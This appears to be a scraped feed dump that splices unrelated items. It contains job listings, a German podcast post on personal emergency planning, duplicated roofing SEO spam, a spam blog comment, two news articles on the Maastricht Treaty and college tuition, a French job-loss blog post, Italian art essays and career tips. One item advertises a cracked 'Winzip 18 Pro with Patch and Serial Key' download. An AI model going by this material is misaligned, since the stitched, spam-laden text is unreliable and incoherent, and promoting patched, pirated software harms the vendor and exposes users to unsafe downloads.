Execution Specialist | Algo Services - Liquidnet Holdings        
New York, NY - New York
ApplyApply with LinkedIn
Job Description
Liquidnet?s Algo Services Group is seeking an Execution Specialist to service our Algorithmic and Trade Analysis offerings. This individual will serve in a consultative capacity, partnering closely with our sales team and Members
          #044: So erstellen Sie einen Notfallplan         

So erstellen Sie einen Notfallplan

Was passiert eigentlich, wenn Ihnen etwas zustößt? Was ist, wenn Ihnen etwas passiert und Sie sind nicht mehr da? Finden Ihre Angehörigen dann die relevanten Daten und digitalen Dokumente?

Das sind keine einfachen und schon gar keine angenehmen Fragen. Doch auch Sie sollten sie sich stellen. Denn diese Fragen betreffen nicht nur Unternehmer und Selbstständige, sondern uns alle.

Hier sind meine Gedanken zu dieser Situation und was Sie tun können.

So erstellen Sie einen Notfallplan

In der Folge stelle ich ein paar Fragen, die Ihnen helfen, einen Notfallplan zu erstellen:

  • Wie lautet das Passwort für Ihren Computer?
  • Wie lautet das Passwort für Ihr Mobiltelefon (inkl. PIN und PUK)?
  • Wo befinden sich die weiteren Passwörter?
  • Wie ist die Logik bei der Verzeichnisstruktur?
  • Welche Daten/Dateien sind besonders wichtig?
  • Welche Bankkonti gibt es?
  • Wie lauten die PIN-Codes für die Bankkarten?
  • Wie kann man sich für das E-Banking anmelden?
  • Welche Verträge haben Sie zu erfüllen bzw. müssten gekündigt werden?
  • Welche Webseiten haben Sie und wo sind sie gehostet?
  • Wo befinden sich die (Kunden)Adressen?
  • Wo sind Ihre Termine?
  • Wo haben Sie Ihre Fotos gespeichert?
  • Wie lauten die Passwörter für Ihre E-Mail-Accounts?
  • Wie kann man Mails automatisch weiterleiten oder eventuell eine automatische Antwort einrichten?
  • Wie kann man eine Nachricht auf Ihre Webseite setzen und wie soll sie lauten?
  • Wie soll mit den sozialen Netzwerken umgegangen werden (Facebook, Twitter, Google Plus, Xing, LinkedIn usw.)? Sollen die Profile einfach gelöscht werden?

Weiterempfehlen

Hat Ihnen diese Folge gefallen? Dann empfehlen Sie den Podcast doch weiter. Damit unterstützen Sie gleichzeitig mich und meine Arbeit.

Besonders hilfreich sind positive Bewertungen bei iTunes. Klicken Sie gleich weiter unten auf den iTunes-Link und schenken Sie mir ein paar Sterne. Vielen Dank!

Den Podcast abonnieren

In meinem Podcast “einfach produktiv” geht es jede Woche darum, Ihr Zeitmanagement zu verbessern. Sie können meinen Podcast abonnieren. Sobald eine neue Folge erscheint, erhalten Sie sie so automatisch:


          Ray Dalio, manager of the world's largest hedge fund, says buy gold on rising North Korea risk        
Bridgewater Associates founder Ray Dalio says in a LinkedIn blog post market "risks are now rising" and recommends gold.
          Call (313) 332-4858 | Find The Best Roofing Contractor Detroit MI| Roof Replacement, Roofing Repair        

Find More Information BelowWebsite: http://detroit.roofingrepair-service.comContact Us: http://detroit.roofingrepair-service.com/contact-usGoogle Map: https://www.google.com/maps/d/viewer?mid=1f7JKEKLs8g8b350s_c_FZKLPP6w&ll=42.425976%2C-83.14993200000004&z=13 Find Us on the WebRoofing Directory: http://roofingrepair-service.com/michigan/detroit-rooferGoogle Business: https://plus.google.com/+Roofingrepair-serviceYelp: https://www.yelp.com/biz/detroit-roofing-service-detroitYellow Pages: http://www.yellowpages.com/detroit-mi/mip/detroit-roofing-service-527007399Mapquest: https://www.mapquest.com/us/michigan/business-detroit/detroit-roofing-service-370994688Manta: https://www.manta.com/c/mx6kzsk/detroit-roofing-serviceElocal: http://www.elocalroofers.com/profile/detroit-roofing-service-18818950#!/tab=aboutBrownbook: http://www.brownbook.net/business/41003284/detroit-roofing-serviceSuper Pages: http://www.superpages.com/bp/detroit-mi/detroit-roofing-service-L2706571368.htmBizvotes: http://www.bizvotes.com/mi/detroit/roofing/detroit-roofing-service-564454.htmlMeet A Roofer: https://meetaroofer.com/metro-detroit-roofing-repair-contractor-roofer-mi Get Social With UsFacebook: https://www.facebook.com/detroitroofingservice/Google Plus: https://plus.google.com/115699286310663908386Twitter: https://twitter.com/DetroitRooferPinterest: https://www.pinterest.com/DetroitRoofer/Linkedin: https://www.linkedin.com/in/detroitroofingrepaircontractorYoutube Channel: http://www.youtube.com/c/Roofingrepair-serviceYoutube Video: https://www.youtube.com/watch?v=i_hldYo9Fo4Tumblr: http://detroitroofingrepairservice.tumblr.com The post Call (313) 332-4858 | Find The Best […]

The post Call (313) 332-4858 | Find The Best Roofing Contractor Detroit MI| Roof Replacement, Roofing Repair appeared first on Improvisation.


          Call (313) 332-4858 | Find The Best Roofing Contractor Detroit MI| Roof Replacement, Roofing Repair        

Find More Information BelowWebsite: http://detroit.roofingrepair-service.comContact Us: http://detroit.roofingrepair-service.com/contact-usGoogle Map: https://www.google.com/maps/d/viewer?mid=1f7JKEKLs8g8b350s_c_FZKLPP6w&ll=42.425976%2C-83.14993200000004&z=13 Find Us on the WebRoofing Directory: http://roofingrepair-service.com/michigan/detroit-rooferGoogle Business: https://plus.google.com/+Roofingrepair-serviceYelp: https://www.yelp.com/biz/detroit-roofing-service-detroitYellow Pages: http://www.yellowpages.com/detroit-mi/mip/detroit-roofing-service-527007399Mapquest: https://www.mapquest.com/us/michigan/business-detroit/detroit-roofing-service-370994688Manta: https://www.manta.com/c/mx6kzsk/detroit-roofing-serviceElocal: http://www.elocalroofers.com/profile/detroit-roofing-service-18818950#!/tab=aboutBrownbook: http://www.brownbook.net/business/41003284/detroit-roofing-serviceSuper Pages: http://www.superpages.com/bp/detroit-mi/detroit-roofing-service-L2706571368.htmBizvotes: http://www.bizvotes.com/mi/detroit/roofing/detroit-roofing-service-564454.htmlMeet A Roofer: https://meetaroofer.com/metro-detroit-roofing-repair-contractor-roofer-mi Get Social With UsFacebook: https://www.facebook.com/detroitroofingservice/Google Plus: https://plus.google.com/115699286310663908386Twitter: https://twitter.com/DetroitRooferPinterest: https://www.pinterest.com/DetroitRoofer/Linkedin: https://www.linkedin.com/in/detroitroofingrepaircontractorYoutube Channel: http://www.youtube.com/c/Roofingrepair-serviceYoutube Video: https://www.youtube.com/watch?v=i_hldYo9Fo4Tumblr: http://detroitroofingrepairservice.tumblr.com

The post Call (313) 332-4858 | Find The Best Roofing Contractor Detroit MI| Roof Replacement, Roofing Repair appeared first on Improvisation.


          Europe Summit Aims to Revive Lost Momentum Toward Unity         

WITH public opinion soured on the merits of European unity, European Community leaders hope to ``relaunch Europe'' with a special summit tomorrow celebrating ratification of the long-awaited Maastricht Treaty.

``It's important to get the public thinking in terms of Europe again,'' says one Belgian Foreign Ministry official.

But the celebration risks being seen as irrelevant by much of the public it targets, as Europeans worry about record-high unemployment, challenges to their infant-to-elder social-welfare system, and instability on the continent's eastern borders.

``In Germany, at least, people are thinking about their job security, while published opinion is wondering about the future course of Russia, and neither one sees how the EC can have a major impact on those concerns,'' says Josef Janning, deputy director of the research group on Europe at the University of Mainz in Germany. ``People are seeing such issues less in European and more in national terms.''

The Maastricht Treaty, an ambitious blueprint for providing the EC with a monetary union and a common foreign and security policy by the latter part of the decade, was supposed to have been ratified and the process of its implementation begun in January 1992. That the treaty was not fully ratified until this month, when the German constitutional court finally approved it, provides a measure of the public doubt about Maastricht's goals.

In the two-year delay, Maastricht was battered by an initial outright rejection by Danish voters in a referendum, plus rough ratification battles in Britain and France. The European currency crises of October 1992 and this past summer mocked the monetary union goal, while the EC's weak and disjointed response to the war in Bosnia-Herzegovina posed deep questions about the feasibility of a common foreign policy. Operation `restore stature'

Tomorrow's summit, held in Brussels, is a German-French initiative to try to restore both Maastricht's and Europe's public stature. But even in France, where regard for the Community runs high, doubts are strong about what this summit can accomplish.

``No one should expect much of anything concrete out of this summit,'' says Phillipe Moreau-Defarges, an EC specialist at the French Institute of International Relations in Paris. ``There's too much division among the EC countries for decisions to be made.''

One possible area of action that Mr. Moreau-Defarges cites provides a good example of the Community's current lack of a common vision. The summit could give a new boost to earlier economic ``growth initiatives'' that have had trouble getting off the ground, he says.

Elsewhere in Europe, where public spending is already causing record debts, and where skepticism is strong over the actual impact of large public-works programs, enthusiasm for such proposals is slight.

``The German public is definitely not in favor of this kind of centralized program to rebuild Europe's economic strength,'' Dr. Janning says. ``People in Ireland or Portugal may see Brussels [EC headquarters] as a guarantor or creator of jobs,'' he adds, since those countries receive substantial EC development funds, ``but they certainly don't in Germany.''

Germany and France also had wanted to take up another issue at the summit: Community institutional reforms. The larger countries feel their power is too limited by the generally equal rights of smaller members, and concern is growing that the Community's enlargement to include three or four new small members by 1995 will further tilt the balance and generally render the Community more bureaucratic and plodding. Putting off reform

German proposals for streamlining the EC administration met with staunch resistance from small members, and reform will likely be put on hold until the next EC treaty review in 1996.

To demonstrate that Maastricht is now in force, EC leaders are expected to prepare the next stage of economic and monetary union by launching the European Monetary Institute, ``embryo'' of a future European central bank. The institute's location in Germany is likely to be approved, a move that could open the way for decisions on the placement of several other new EC institutions, including a patent office and environmental agency.

Still, there is a lingering feeling that Maastricht, negotiated in 1990, is a treaty already left behind by European events. ``By spring of next year we may very well have a new imperial Russia to contend with, something never imagined when Maastricht was written,'' Janning says. ``Economies are seen more in national terms. [Community] leaders will have to work hard,'' he adds, ``to demonstrate that Maastricht is relevant in these conditions.''

Become a part of the Monitor community


          Winzip 18 Pro with Patch and Serial Key        
Winzip 18 Pro
Winzip 18 Pro with Patch and Serial Key | 82.43 MB

Unzip all major formats
With just a click, open all major compression file types, including Zip, Zipx, RAR, 7Z, TAR, GZIP and more.

Protect your privacy
Easily encrypt files as you zip to keep information and data secure. Add watermarks to deter unauthorized copying.

Simplify cloud sharing
Share directly to more cloud services, manage your cloud files more easily, and quickly share links to your cloud files.

Just add WinZip
Bring popular WinZip features into the software you use most with new WinZip Express Add-Ons*.

Features:
Zip and manage content
Compressing large files and folders makes them easier to transfer and saves storage space. Choose files from your PC using simple, drag-and-drop functionality or get files you've stored on Box, SkyDrive, Dropbox, Google Drive, CloudMe and SugarSync to zip instantly. Zip files are perfect for sharing because they let you organize multiple files into one convenient package.

Unzip anything
Extract content from the industry's widest selection of compressed file types, including Zip, Zipx, RAR, 7Zip, BZ2, LHA/LZH and many more. When extracting encrypted files, WinZip auto-wipes all temporarily extracted copies to prevent misuse.

NEW! Connect to more cloud services
WinZip connects directly to Box, SkyDrive, Dropbox, Google Drive, CloudMe and now SugarSync, so you can organize all your cloud files at once. Use WinZip to zip and save large files to the cloud or retrieve files or links to share. Secure your files and save precious online storage space by zipping and encrypting them first.

NEW! One-stop cloud file sharing
Imagine being able to see all your cloud files—even if they are saved on various cloud services—in a single view. Now you can, with WinZip 18. Instead of wasting time moving back and forth between various services to see where your files are and how much space you have, enjoy fast, easy cloud file sharing without leaving WinZip.

Zip and share to social media
Use ZipShare to share any type of file to Facebook, Twitter and LinkedIn. Keep everyone in the loop by posting content to all three social networks at once. Simply select the files you want to share, compose your message, and pick the social networks where you want your files to go.
 
NEW! Email large files with just a click
WinZip 18 lets you email large files or folders using any of your cloud services. Your files are automatically uploaded to your default cloud service and a link to them is placed in your outgoing email. Send up to 50MB free if you're using the ZipSend cloud or move up to ZipSend Pro to send up to 2GB. and etc

What's New:
NEW! Zip and share to more clouds
Protect your files in the cloud and use less space by zipping them first. WinZip 18 lets you connect directly to your cloud services, including Box, Google Drive, SkyDrive, Dropbox, CloudMe and SugarSync. Zip before you upload, open zip files saved in the cloud, or select files from the cloud to zip and share.

NEW! Streamlined cloud navigation
Access and manage your cloud files as easily as you access the files on your computer. WinZip 18 makes it simple to send files to and from the cloud, save between your cloud accounts and monitor your cloud storage space.
 
NEW! Copy and share Cloud Links
Quickly send links to your cloud files by email, instant messaging and on social media sites.
 
NEW! Work faster with WinZip Express Add-Ons
Bring the power of WinZip into the software you use every day. Download the WinZip Express Add-On for Explorer for free and get instant access to the WinZip features you use most directly within Explorer. Add-Ons are also available for Microsoft Outlook, Photos and SharePoint.
 
NEW! Compress files even more
Make Zip and Zipx files even smaller with the enhanced zip engine in WinZip 18.

Download Link
          Stage - Project Manager Support        
Siemens - Trento - ID Lavoro 271448 - Pubblicata 08/08/2017 - Italia - Trento - Energy Management - Project Management - Studente - Determinato - Solo full time Candidati Fai domanda usando LinkedIn™ Salva lavoro Invia per e-mail ad un amico Torna all'elenco Job ID: 271448 Location: Trento Or...
          Stage - Project Manager Support        
Siemens - Trento - Job ID 271448 - Posted 08/08/2017 - Italy - Trento - Energy Management - Project Management - Student - Limited - Full time only Apply Apply Using LinkedIn™ Save Job Email Job to Friend Return to List Job ID: 271448 Location: Trento Organization: Siemens Transformers S.p.A....
          Comment on Thoughts upon returning from the Big Apple by http://houston-texas-dentist.com        
I drop a leave a response each time I especially enjoy a article on a website or if I have something to valuable to contribute to the discussion. It's a result of the passion displayed in the post I browsed. And after this post Thoughts upon returning from the Big Apple | Susan Wilson's Blog. I was moved enough to drop a thought :-) I actually do have some questions for you if you do not mind. Is it simply me or do some of these responses appear like they are written by brain dead individuals? :-P And, if you are writing on other online social sites, I'd like to follow you. Would you list the complete urls of your social pages like your twitter feed, Facebook page or linkedin profile?
          Faire le deuil d'une entreprise        
copyright photo-libre.fr
Mettre un message d'absence pour annoncer la fin de sa mission (de son CDD en réalité)
Supprimer les agendas professionnels des anciens collègues sur Google
Réactiver les alertes Linkedin et Monster
Mettre à jour son CV
Ecrire une lettre de motivation type
Devoir retourner au Pôle Emploi
Recontacter les chasseurs de têtes
Réactiver son réseau
Chercher un nouveau challenge professionnel

Depuis le 1er juillet, je suis de nouveau sur le marché du travail (je pourrais aussi dire au chômage c'est une réalité). Après 2 CDD dans la même entreprise, on ne m'a pas proposé de CDI, ni de nouveau CDD. Apprendre la nouvelle 15 jours avant la fin de mon contrat, je l'ai très mal digéré... Finalement c'est une société qui ne me mérite pas ! J'ai passé des entretiens ailleurs sûrement pour me précipiter. Finalement, je sais ce que je dois faire aujourd'hui : faire le deuil de cette entreprise.

Après les vacances, je recommencerais à chercher et je veux surtout quelque chose qui me ressemble. Quand on me demande ce que je souhaite aujourd'hui, je répond souvent "un nouveau challenge !". Un cdd, un cdi ou autre pourvu que la mission qu'on me propose soit "sexy". J'ai la chance de faire un métier que j'aime alors autant en profiter.

Sur ce, je vous laisse mes vacances m'attendent... Et je n'ai pas apporté mes soucis dans mes valises.


          ARTWORKS        





more artworks

Artworks è un insieme composito, che ricorda un oggetto sapiente e ricco di fascino, qual è l'erbario. Queste opere infatti parlano la lingua del generale  e del particolare; hanno complici il caso e la cura; sono legate al gesto e muovono all'astrazione; evocatrici di natura e poesia. Come nella costruzione dell'herbarium in loro c'è la grazia della raccolta, della scelta, della gratitudine; sono frutto di un comporre per dare senso. I singoli di Enrico Marani sono luoghi dell'anima fermati sull'alba tabula della memoria. Hanno estensione simbolica molto forte, senza perdere essenzialità.  Ogni opera declina un verso, con la leggerezza e la potenza di un'immagine parlante che va oltre la sua materialità. Ci sono abitudini e curiosità, bisogni e capacità creative che perdiamo con il tempo. Enrico Marani ce le restituisce con l'abilità e la sapienza di chi riscopre un'attitudine. Un linguaggio fatto di incontri, di sovrapposizioni, di chiusure ed aperture dove l'istantaneità e l'eternità si fanno complici. L’'evocazione di paesaggi reali ed immaginari, terribilmente vivi e fantasticamente inesistenti. Il simbolico non è sublimazione ma arcaica corrispondenza del concreto e dell'astratto. Scopriamo l'astro nella sua assoluta perfezione sorgere dal buio della terra (composition 13) o l'occhio pericoloso di Medusa nell'assoluta fissità dei fili e degli sterpi annodati (composition 10); dentro una piccola cavità scopriamo la “possibilità” che appartiene ad ogni dolorosa crepa che si apre nel contingente (composition 10); troviamo la potenza evocatrice della memoria paga di se stessa finché non viene invasa dalla verdescenza del presente (composition 3), per fare qualche esempio. Marani è un artista poliedrico, la cui espressione è nella forma più completa segno parola suono. Il segno che nelle sue opere assume su di sé la capacità di evocazione poetica. Ama definirsi “scultore musicale”* perché capace di mescolare i sensi e le abilità. In Artworks a ciò si aggiunge una ricerca sapiente di comunicare al di là dell’io. Sono le cose, i frammenti di una natura non addomesticata nelle forme, non neutralizzata dall’identità della nomenclatura scientifica, ma viva, imperfetta a volte mescolata ad altro che non solo riconosce ma ingloba, fortifica, domina. È un’arte delle cose nella loro immortalità poetica, è una comunicazione che supera il dire della soggettività, perché come ci suggerisce il filosofo Remo Bodei il privilegiare la cosa rispetto al soggetto è mostrare il soggetto stesso nel suo rovescio. Non troviamo nei singoli dell’artista il suo sé deforme, alterato, idealizzato, ma il suo gesto, il suo cogliere e deporre come atto di universalità. Non è sul sogno, sulla ricerca di perfezione, sul fantastico che troviamo in questa collezione il senso dell’arte, ma nella possibilità di parlare attraverso l’istante che si itera al di là della sua volontà.
Come gli erbari, dove il perdere la propria tridimensionalità significa acquistare per sempre e per molti la propria eternità.


Micol Perfigli


more artworks

Queste opere parlano di incontri. Tra chi? Non è dato saperlo con certezza. Elementi della natura, potremmo dire. Ma quale natura? Non certo la natura nel senso ristretto, moderno, ma in quello più ampio della physis greca, all'ascolto della quale Heidegger ha rieducato il nostro orecchio. Anche due reti di plastica possono essere, e qui sono, physis. Natura, prima ancora che nel senso di potenza, nel senso di mistero. Non la natura romantica, non la natura intesa come forza, o come mondo, o come orizzonte inglobante, ma, piuttosto, come ciò che spunta e cresce oltre il mondo e l'orizzonte, tra le loro pieghe, rompendo le pieghe stesse. Natura come ciò che sorge spontaneamente, sommessamente, sempre sotto possibile smentita, che viene dal nulla e nel nulla è destinato a tornare – e che, a differenza del sistema, non se ne fa problema. Non una forza che si oppone ad altra forza ma un soffio che se ne sottrae radicalmente. Elementi, abbiamo detto. Mi ha colpito, in questi lavori, questa strana sospensione che invita a considerare, nell'accordo generale, ciascuna singolarità: un equilibrio miracoloso e paradossale tiene separate le identità di ciascun elemento anche nelle opere apparentemente più corali. Anche negli intrecci, anche negli addensamenti attorno a un punto: superata la visione d'insieme, ognuno di essi ci invita ad essere considerato nella sua propria esistenza. Potere della materia sull'attività uniformante della visione, della pittura. In queste opere, ogni singolarità si espone di per se stessa, con una propria luce, una propria resistenza, irrestibilmente, naturalmente – ed ecco ancora questo significato quasi capovolto di natura, che non significa più uniformità ma emersione dall'uniformità. ingolarità che esige di essere guardata, nella sua fragilissima presenza; null'altro da offrire che se stessa, nessun escamotage, eppure proprio questa nudità è seducente al massimo grado, è un coraggio che sentiamo mancarci. E l'occhio rimane lì. Ma abbiamo detto anche: incontri. Incontri tra due elementi (che può significare: tra due singolarità dello stesso tipo, ma anche tra due tipi diversi). Ciò che emerge dalla physis non è incurante. In queste opere sembra che la tensione verso ciò che è sorto dietro o davanti a me, di fianco a me, sia la prima preoccupazione della cosa stessa. Io vengo al mondo, e per questa stessa ragione immediatamente mi piego, mi dispongo verso l'altro. Gli elementi, qui, sono solo apparentemente rigidi e fissati. Da essi emerge un bisogno di comunicazione – anche negli elementi apparentemente più potenti, più in alto nella gerarchia dell'esistente tracciato dalla disposizione delle tavole. Nessuno di essi può essere solo, ma, ancora di più: nessuno vuole esserlo. In queste opere, nella loro purezza, venuta al mondo e desiderio si concentrano l'uno nell'altro fino a coincidere. Nel silenzio, gli elementi si parlano in un modo soprendente. Ed è proprio il discorso sull'incontro che ci porta al grande assente: l'uomo, quello che sta davanti l'opera e quello che le sta dietro. "Grande assente", perché assente di un'assenza sempre ricordata. Da qui, da questi incontri, l'uomo non è semplicemente andato via. Esso rimane come un sottointeso. L'uomo non compare – eppure il suo fantasma silenzioso sta dietro a questi lavori, impercettibilmente ma senza possibilità di smentita. Non sono opere dentro le quali ci si abbandona. In esse continua a percepirsi la risonanza del gesto, il lavoro, la regola. Regola talora apparentemente invisibile, ma non assente. Il sole accecante attorno al quale tutto si organizza, che pure non possiamo guardare direttamente. L'invisibilità della linea parla della misteriosità di questa regola, misteriosa almeno quanto il sorgere delle cose stesse. Mistero che l'artista rispetta. Non bisogna lasciarsi traviare dalla geometria delle disposizioni: non è una geometria imposta estrinsecamente, anche quando essa si fa più scopertamente violenta. Al contrario, essa dà quasi l'impressione di sorgere dalle cose stesse, come se l'artista si fosse semplicemente limitato a fotografare la disposizione del loro incontrarsi – qui forse esce l'occhio fotografico (e cinematografico) di Enrico –, come l'istologo congela la grande danza dei cromosomi nel susseguirsi delle fasi del ciclo della cellula, che da una si fa due. La regola, abbiamo detto quindi, è evidente: ma non è l'uomo che dà la regola, quanto piuttosto segue quella che le cose nel loro farsi gli suggeriscono. Ciò che si sente qui in modo supremo è quel mistero eminente dell'arte, secondo il quale l'artista, a un certo punto, sente che l'opera, che pure egli ha prodotto, non è più sua. In questi lavori, sembra che l'artista abbia da sempre soltanto guardato il suo materiale, e quasi si stringe a noi in una contemplazione magica. Per questo motivo ho scritto che il lavoro è allo stesso tempo evidente e sottointeso, che la regola organizza, ma secondo i ritmi che le cose impongono: per questo ho detto che l'uomo c'è, ma come fantasma. Mi immagino, guardando queste opere, che lo sguardo dello spettatore, davanti ad esse, se potesse bucarle, troverebbe specularmente lo sguardo dell'artista, che pure da da dietro le guarda. Più che fare, egli permette che le cose si facciano. Ricordo una conversazione con Enrico sul mistero di essere padre e madre, in cui egli ribaltava la logica consueta che vede il figlio come qualcuno o qualcosa da plasmare, per confessare che il problema era piuttosto il contrario: capire cosa voleva il figlio dal padre e dalla madre, capire in che modo ciò che era stato generato interpellava il generante, capire in che modo egli chiedesse di seguirlo lungo le proprie strade. Paradosso del creatore che viene creato a sua volta dalla creatura, come ha scritto anche Lévinas. Paradosso umano, prima ancora che artistico.Dietro all'incontro delle cose, l'uomo. L'uomo che accompagna la vita della natura, che la annusa con una riverenza religiosa: non acritica, ma umile. L'uomo che sente il respiro della natura, quando sa di non possederlo più: e con quest'immagine del respiro, certo logora e abusata, vogliamo significare un evento reale: quello per cui, paradossalmente secondo le nostre regole, le cose, nel loro silenzio e quindi senza apparente comunicazione, si rendono disponibili per ogni altra. Non dicono "sono qui, e posso fare per te questo". Il "posso" e il "questo" non sono nella loro disponibilità. Essere al mondo è già un essere radicalmente esposto. Tacciono, quasi disarmate, consapevoli dell'inevitabilità del respiro. Non un respiro "cosmico", cioè, in fondo astratto, perché valido "per tutti e per ciascuno", ma un respiro che condivide l'aria con ciò che gli è stato messo di fianco (di nuovo, Heidegger e la Geworfenheit?), che si apre alla stessa aria: e l'aria non è uguale dappertutto, e non ogni cosa va bene per tutti. Si conserva qui, cioè, il senso della differenza. La fragilità dell'incontro che è anche ciò che lo rende autenticamente tale, il suo poter sopravvivere magari anche un istante solo, il suo essere dipendente da certe condizioni, da un certo tempo. Irripetibile, davvero. Dipendente dal tempo e dallo spazio; e in un certo senso al di fuori, come miracolosamente emergente dal tempo e dallo spazio, in altre parole: vita: "Il significato dell'universo non sta nell'universo".

Davide Bertolini

 



          Physical Internet: When Science meets Industry        
Sergio Barbarino, research fellow of P&G Research & Development organization, about the Physical Internet.

Sergio Barbarino, research fellow of P&G Research & Development organization, about the Physical Internet.

Procter & Gamble is the largest international consumer goods company. Their products are marketed in more than 180 countries around the world and used by over 4 billion people every day. In order to improve the lives of the world’s consumers P&G’s aim is to innovate sustainably – and is thus very interested in turning the Physical Internet from vision to reality.Read more


          Reasons to kill your LinkedIn account        
Some of the latest Terms of Service in Linkedin’s User Agreement: Linkedin’s Unlimited License to Sell My Information to Anyone: Section 2.2 of the user agreement grants Linked an unlimited license to do whatever it wants with the information you post on Linkedin, including the right “to use and commercialize, in any way now known […]
          Easy, eh? Tales of cheating on campus        
Easy, eh? Tales of cheating on campus
  David Graham* was pulling all-nighters for his entrepreneurship class at Ryerson University. He was exhaustively working on group projects, so when a paper worth 5 per cent was assigned, he decided to copy information off a company website. “I was scared about handing it in. I had never plagiarized before,” he says. “I didn’t know what the chances of […]

          Poll: Have you ever cheated at Ryerson?        
Poll: Have you ever cheated at Ryerson?

          Plagiarism: Failure isn’t the only option        
Plagiarism: Failure isn’t the only option
Moving to a new country and starting a university education in a foreign language is hard enough. But imagine the trauma from getting a notice that you’re suspected of plagiarism. It’s an accusation that could lead you to fail your course or be expelled. “I’ve had a lot of CESAR members come into our office and some just immigrated to […]

          As Students Struggle to Pay Tuition, Schools Scramble to Trim Budgets         

HOLLY SNIFF, who is the first person in her family to attend college, found out about making hard choices early on. "I really wanted to go out of state for school, but because of financial reasons I couldn't," says Ms. Sniff, who is now a sophomore at the University of Virginia in Charlottesville.

For as long as she can remember, Sniff has been putting away money for her education. "I saved every dollar I was given as birthday presents or special treats as a child," she says.

Those childhood savings along with summer earnings and additional financial help from relatives got Sniff through her first year of college. But tuition continues to rise, and Sniff, along with millions of other students, is struggling to keep up.

At the same time, both private and public colleges and universities are moving beyond trimming at the margins to control costs.

Many schools are freezing faculty salaries, suspending hiring, delaying building maintenance, limiting course offerings, and even cutting academic departments.

Administrators are finding that they can no longer fund every project, department, or program. In the 1991-92 academic year, 57 percent of all colleges and universities were forced to reduce their operating budgets, according to an annual survey by the American Council on Education in Washington, D.C.

At the University of Vermont, a budget committee's proposal to eliminate the School of Engineering led to an uproar and the eventual resignation of the university's president.

AS state funding shrinks, public universities are being forced to increase class sizes and cut back on student services. Students at California's public universities have staged massive student protests against overcrowded classes and eye-popping tuition increases.

Nationwide, public colleges raised their tuition and fees an average of 10 percent and private-college increases averaged 7 percent this year, according to the College Board's annual survey released last month.

"Given the state of the economy and its impact on state budgets, many people expected much larger [tuition] increases this year, particularly in the public sector," says Donald Stewart, president of the College Board.

The rate of increase for public-college tuition is actually down this year compared with last year's 13 percent rise. And private colleges held their increases to last year's rate.

Yet that doesn't mean tuitions are gravitating back to earthly levels, warns Arthur Hauptman, a college tuition consultant.

"What the public tuition number says is that the recession has eased a little bit," he says. "If things get better [in terms of the economy], you would expect to see some additional reduction in those numbers."

In the '90s, Mr. Hauptman points out, there is much more competition for state funds than there was in the 1980s. Health care, prisons, and elementary and secondary education are all clamoring for funding.

"Despite predictions at the beginning of the '80s that it would be a tough decade, it turned out to be a very good decade for higher education in terms of revenue growth," Hauptman says. "Every major revenue source for colleges grew in real terms during that time - federal, state, tuitions, endowments, sales, and services."

And how were those revenues spent? Some faculty critics argue that the funds were spent on administrative bloat. "The fact is that in the '80s administrative staff at both private and public colleges grew much faster than the faculty," Hauptman says. "It is also true, however, that in the 1980s faculty salaries increased in real terms."

Last year, Rep. Patricia Schroeder (D) of Colorado launched a congressional investigation into the skyrocketing cost of tuition at public colleges.

"When it comes to college education, American families are paying more and getting less," she said. "Since 1980, the cost of sending our kids to college, a key part of the American dream, has doubled or tripled the rate of inflation every single year."

The investigation found that the growing research orientation of public higher education has fed the spiraling tuition costs. The teaching load of professors dropped from the traditional 15 hours per semester to as low as six hours per semester at some institutions, according to the study.

Pinning down the cause of increased tuition at either public or private universities isn't easy. Education is a labor-intensive enterprise that does not lend itself to productivity gains, administrators argue.

"Because faculty salaries have lagged in the past and because of competition for faculty among universities and industry, faculty compensation [increases] now exceed inflation," points out Paul Locatelli, president of Santa Clara University in Santa Clara, Calif.

Yet it is possible to increase teaching loads, reexamine the length of the academic year, and de-emphasize research in an effort to gain productivity, argues Hauptman.

"Colleges want to increase their resources; it's a natural inclination," he says. "If you read the college presidents' letters to the parents, you would assume costs are pushing tuition increases. But I think it's more that the revenues provided by the tuition hikes allow the schools to increase costs."

Meanwhile, students like Holly Sniff are willing to work harder or borrow more in order to get a college degree. Sniff expects to have accumulated about $10,000 in loans before she graduates. "I think I'm better off taking out loans now and using my life savings so that hopefully in the future I can find a better-paying job," she says.

Increased indebtedness raises the stakes for many students. "I'm not really concerned with it now," Sniff says, "but as soon as I graduate I'm going to have to get a good-paying job to pay off all of these loans."

Become a part of the Monitor community


          ESME Team Member Meetups - Accidentally on Purpose        
I feel a bit like Woody Allen's Zelig with the uncanny ability to insert oneself into some exceedingly interesting (historic) social environments as a famous nobody. It's like having a passport to be an official "fly on the wall" of some fascinating conversations. You get to be present, observe and on occasion document and record. That's the way I'll approach Office 2.0 this week and that seems to be my experience heretofore with the ESME folks.

“Enterprise Social Media Experiment (ESME) is a Web 2.0 application that permits social network-based communication among, between, and outside organizational boundaries. ESME draws its development team from the SAP Community and includes both BPX'ers and business people with an interest in learning how social networks, the media they generate and business processes can be usefully co-mingled to deliver innovative solutions to old world problems.” (Darren Hague, Richard Hirsch and others in the SAP Community Contributor Corner wiki)

When Dick Hirsch began to flesh out and realize the original BPX community project, it was obvious that he was a quintessential or model SAP business process expert: a professional with deep SAP technical acumen, experience of business modeling tools and process improvement methodologies, as well as an adept story teller with a keen journalistic eye and language.

The ESME conversationalists list (those engaged in the collaborative conversation about ESME) looks like a “whose who” of some top SAP Community Network members.

So being the declared online yenta I am (which is a grandmotherly busybody), I wanted to know more about those virtual members I haven’t yet had the pleasure to meet.

I’m fortunate to go around the world these next few weeks and I’ll be rubbing shoulders with almost all of the ESME folks, some by purpose and design and a few, quite serendipitously (like in the case of David Pollack who happens to be with me this week at Office 2.0). There are even a few folks I got to meet-up with recently at their invitation, having nothing to do with ESME whatsoever. Such is the case with Jen Robinson and Kirsten Gay who I met with 2 weeks ago in the US SAP headquarters in Newtown Square when I was invited to meet with the team of Natalie Hanson an "anthropologist working in the business world" and Kirsten and Jen's manager.

Kirsten and Jen happen to be members of the ESME team.

I was interested in the skills they bring to the table and their internal portal work and particularly in their focus on the very human side of technology.

Here's their brief bios:

S Kirsten Gay is the Manager of User Experience at SAP America and experienced in user interface design, design team management, integration of design deliverables with market demands, and strategic development of design services for corporations, educational institutions and private clients.

Jen Robinson, currently a lead in SAP's Global Business Knowledge Management Competency Center and an MBA student at NYU Stern whose professional interests include IT strategy, emerging technologies, entertainment, and new media.


          Three Actions to Take When Looking for a Job        

One of the things I do is work with people looking for a job. Sometimes they are entering the job market for the first time; sometimes they just got fired or laid off. Either way, if you have not been in the job market, there are three actions you should take immediately to increase your […]

The post Three Actions to Take When Looking for a Job appeared first on Elephants at Work.

            

          Revealing your weaknesses in an interview        

